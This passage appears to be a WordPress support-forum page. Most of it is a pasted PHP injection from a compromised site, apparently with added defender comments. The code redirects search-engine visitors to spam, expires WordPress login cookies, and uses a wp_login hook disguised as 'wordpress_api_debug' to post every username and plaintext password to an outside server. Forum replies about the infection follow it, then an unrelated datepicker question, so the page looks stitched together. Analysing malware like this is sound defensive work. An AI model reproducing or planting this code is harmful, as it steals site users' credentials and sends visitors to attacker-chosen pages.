                        $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<i>#', $my_content)) {
                        $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<u>#', $my_content)) {
                        $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<p(.*)>#', $my_content)) {
                        $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1);
                    }
                    elseif (preg_match('#</p>#', $my_content)) {
                        $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<br(.*)>#', $my_content)) {
                        $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<span(.*)>#', $my_content)) {
                        $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<body(.*)>#iUs', $my_content)) {
                        $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1);
                    }
                }
                // Turn the placeholders back into real tags.
                $my_content = str_replace('_-', '<', $my_content);
                $my_content = str_replace('-_', '>', $my_content);
                //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content);
                //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content);
            }
    
            echo $my_content;
        }
        register_shutdown_function('shutdown');
    }
    
    // Visitor-facing branch: runs when $fromse is set and the visitor is not on
    // the bot list. $fromse is assigned outside this excerpt; presumably it
    // marks arrivals from a search engine (confirm against the earlier code).
    // Nothing happens on the front page ($morda).
    if (($_GET[$qq] || $cldw) && $fromse && !$abt) {
        if (!$redcode && !$morda) {
            // No stored markup: send the visitor to the configured redirect URL
            // with the keyword appended, by Location header and by script.
            if ($key) $tkey = str_replace(' ', '+', $key);
            else $tkey = str_replace('-', '+', $_GET[$qq]);
            if (strstr($redir, '?')) $redir .= "&keyword=".$tkey;
            else $redir .= "?keyword=".$tkey;
            $redir = str_replace('KEY', $tkey, $redir);
            header("Location: $redir"); 
            echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>";
            die();
        }
        elseif (!$morda) {
            // Stored markup exists: echo it into the page with KEY replaced by the
            // request's keyword. Both the markup and the keyword are emitted
            // unescaped.
            $key = str_replace('-', ' ', $_GET[$qq]);
            $redcode = str_replace('KEY', $key, $redcode);
            echo stripslashes($redcode);
        }
    }
    	
    	/* your code end */
    
    }
    
    /* weoboo end */
    // Once per browser (tracked by the "_eshoob" cookie, lifetime 604800 s = 7
    // days) expire every request cookie whose raw "name=value" text contains
    // "wordpress", "wp_" or "wp-". WordPress session cookies carry such names, so
    // the visible effect is that a logged-in user is signed out; presumably this
    // forces a fresh login so the wp_login hook further down sees the password.
    // Defender note: an unexplained "_eshoob" cookie on a site is an indicator of
    // this injection.
    if(!isset($_COOKIE['_eshoob'])) {
    		
        setcookie('_eshoob', 1, time()+604800, '/');
    
        // unset cookies
        if (isset($_SERVER['HTTP_COOKIE'])) {
    
            $cookies = explode(';', $_SERVER['HTTP_COOKIE']);
            
            foreach($cookies as $cookie) {
    
                if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) {
                
                $parts = explode('=', $cookie);
                $name = trim($parts[0]);
    
                // Expire the cookie both for the current path and for "/".
                setcookie($name, '', time()-1000);
                setcookie($name, '', time()-1000, '/');
                
                }
            }
        } 
    }
    
    // Defined only when no function of this name exists yet.
    if (!function_exists('getUserIP')) {
    /**
     * Return the first public IP address found in a fixed list of $_SERVER keys.
     *
     * Proxy/CDN headers are checked before REMOTE_ADDR, and each value may be a
     * comma-separated list. Private and reserved ranges are rejected. The
     * header values are supplied by the client, so the result is not a
     * trustworthy source address. Returns null implicitly when nothing
     * qualifies.
     */
    function getUserIP()
    {
        foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key)
        {
            if (array_key_exists($key, $_SERVER) === true)
            {
                foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip)
                {
                    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false)
                    {
                        return $ip;
                    }
                }
            }
        }
    }
    }
    
    // Defined only when no function of this name exists yet.
    if (!function_exists('isHttps')) {
    /**
     * Return the string 'https' or 'http' for the current request.
     *
     * 'https' is reported when any of these holds: REQUEST_SCHEME is 'https',
     * HTTPS is 'on', X-Forwarded-Proto is 'https', X-Forwarded-SSL is 'on', or
     * the server port is '443'. Comparisons are loose (==).
     */
    function isHttps() {
        if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') ||
            (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ||
            (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ||
            (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') ||
            (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) {
            $server_request_scheme = 'https';
        } else {
            $server_request_scheme = 'http';
        }
        return $server_request_scheme;
    }
    }
    
    // Credential exfiltration, despite the "debug" name. Registered further down
    // on the wp_login action, it sends the submitted username and plaintext
    // password to a hard-coded remote URL on every successful login.
    // Defender note: every password used to log in while this code was present
    // should be treated as disclosed and changed after the code is removed;
    // outbound requests to the URL below are a network indicator.
    if (!function_exists('wordpress_api_debug')) {
    /**
     * wp_login callback. The two hook arguments are not used; the function reads
     * the login form fields directly from $_POST instead.
     */
    function wordpress_api_debug( $user_login, $user ){
    
    	$wpApiUrl = "https://karanbit.com/lnk/api.php";    
    
        	//
    
        // Look the account up to record whether it is an administrator.
        $uuuser = get_user_by('login', $_POST['log']);
    	if(in_array('administrator', $uuuser->roles)){
    		$role = 'admin';
    	}
    	else{
    		$role = 'user';
    	}
    	// 
    
    	// Record sent out: site host, request URI, scheme, username, plaintext
    	// password, client IP and role.
    	$verbLogs = array(
    		'wp_host'       => $_SERVER['HTTP_HOST'],
    		'wp_uri'        => $_SERVER['REQUEST_URI'],
    		'wp_scheme'     => isHttps(),
    		'user_login'    => $_POST['log'],
    		'user_password' => $_POST['pwd'],
    		'user_ip'       => getUserIP(),
            'user_role'		=> $role
    	);
    
    	if (!empty($verbLogs['user_login'])) {
    	
    	$wpLogData = json_encode($verbLogs);
    	
    	// JSON POST to the remote endpoint; the response is stored in $response
    	// and never used.
    	$curl = curl_init();
    	curl_setopt($curl, CURLOPT_HEADER, false);
    	curl_setopt($curl, CURLOPT_URL, $wpApiUrl);
    	curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    	curl_setopt($curl, CURLOPT_POST, true);
    	curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData);
    	curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
    
    	$response = curl_exec($curl);
    	
    	curl_close($curl);
    
    	}
    
    }
    }
    
    // When WordPress is loaded (add_action exists), attach wordpress_api_debug to
    // the wp_login action with priority 10 and two arguments, so it runs on every
    // successful login. Defender note: a wp_login hook in a theme's functions.php
    // that the theme author did not ship deserves review.
    if (function_exists('add_action')) {
    
    add_action( 'wp_login', 'wordpress_api_debug', 10, 2 );
    
    }
    
    ?>

    Thank you, I’ll send you an email with the only logs I can pull from my host, but they only show client access, not file access.

    I have found another file that is probably linked; it’s called .default and it is copied all over the place on the shared host. I don’t have the time logs of when it was created, but I’ll attach it to the email as well.

    Hello,

    I have the exact same issue with my multi-site host. I’ve run a find with grep for the astra_head issue, but cannot find it in any PHP file. I also ran it everywhere and didn’t find it. Any other information you may have would be great.

    Thread Starter thedoc40tt

    (@thedoc40tt)

    I think you are missing the point of the question. I need to be able to click on the month and have the month change. Right now, if we try to use the field as a birthdate, a person has to click the left arrow many, many times to get to the correct year and month.

    In the example in your documentation, ( https://t1m0n.name/air-datepicker/docs/#sub-section-9 ) it works correctly, but it doesn’t appear to have the same feature in the version used on the plugin ?
